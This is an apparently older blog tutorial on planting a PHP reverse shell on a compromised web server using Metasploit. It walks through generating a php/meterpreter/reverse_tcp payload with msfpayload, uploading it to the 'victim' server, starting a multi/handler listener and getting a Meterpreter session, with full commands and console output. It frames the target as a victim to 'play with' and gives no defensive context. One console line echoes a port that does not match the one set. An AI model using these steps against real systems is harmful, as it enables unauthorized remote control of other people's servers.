After hacking a web application or server to such an extent that you can upload files to it, the next thing to try is get a proper shell on the system. The most common approach is to create reverse shells. In this approach first a listener program is run on the hacker's machine and then a program/payload/script is run on the target machine such that it connects back to the hacker's machine to offer a shell/terminal.
Creating reverse shells using php scripts is generally quite easy and can be accomplished with just a small php and a program like netcat. Netcat would run as a listener (a socket server actually) and the php script has to be run on the victim server so that it connects back.
In this example we are going to create reverse shells in php using metasploit. Yes, its too big a tool for such a small task but looks cool anyway.
To brief up the basics about reverse shells remember that it has 2 components. First is the listener on local/hacker system that waits for incoming connections, and the second is the payload script/program that runs on target computer and is configured to connect to the listener and offer a shell.
listener (hacker machine) ++--- reverse shell payload (victim machine)
Once the listener is connected, it can gets a shell which can be used to run any command (limited to the user privilege) on the target system.
So the first step is to create our payload program. This is done using the msfpayload command and looks like this
# msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6000 R > exploit.php
The above command would create a file called exploit.php which is the reverse shell payload. It is just a plain php script that is configured according to the LHOST and LPORT parameters.
Now upload the exploit.php to the target system. Wait, do not run it yet. First we need to start the listener as shown in the next step.
Once the payload is uploaded, the next thing to do is to start our listener which will catch the incoming connection offer. Start msfconsole and run the following commands
msf > use exploit/multi/handler msf exploit(handler) > set LHOST 192.168.1.4 LHOST => 192.168.1.4 msf exploit(handler) > set LPORT 6000 LPORT => 6666 msf exploit(handler) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.4:6000 [*] Starting the payload handler...
Now the listener is ready. Now its time to run the php script on the server. Its uploaded, and now can be run by opening from the browser like a normal url.
As soon as the script starts running, msfconsole will indicate connection and meterpreter session would come up
[*] Sending stage (39217 bytes) to 192.168.1.101 [*] Meterpreter session 1 opened (192.168.1.4:6000 -> 192.168.1.101:43400) at 2013-03-04 17:29:18 +0530 meterpreter >
Now that meterpreter is up, its time to play with the system.
Since it is a php based reverse shell, it is not dependant on the target platform OS in anyways and can run on windows and linux alike.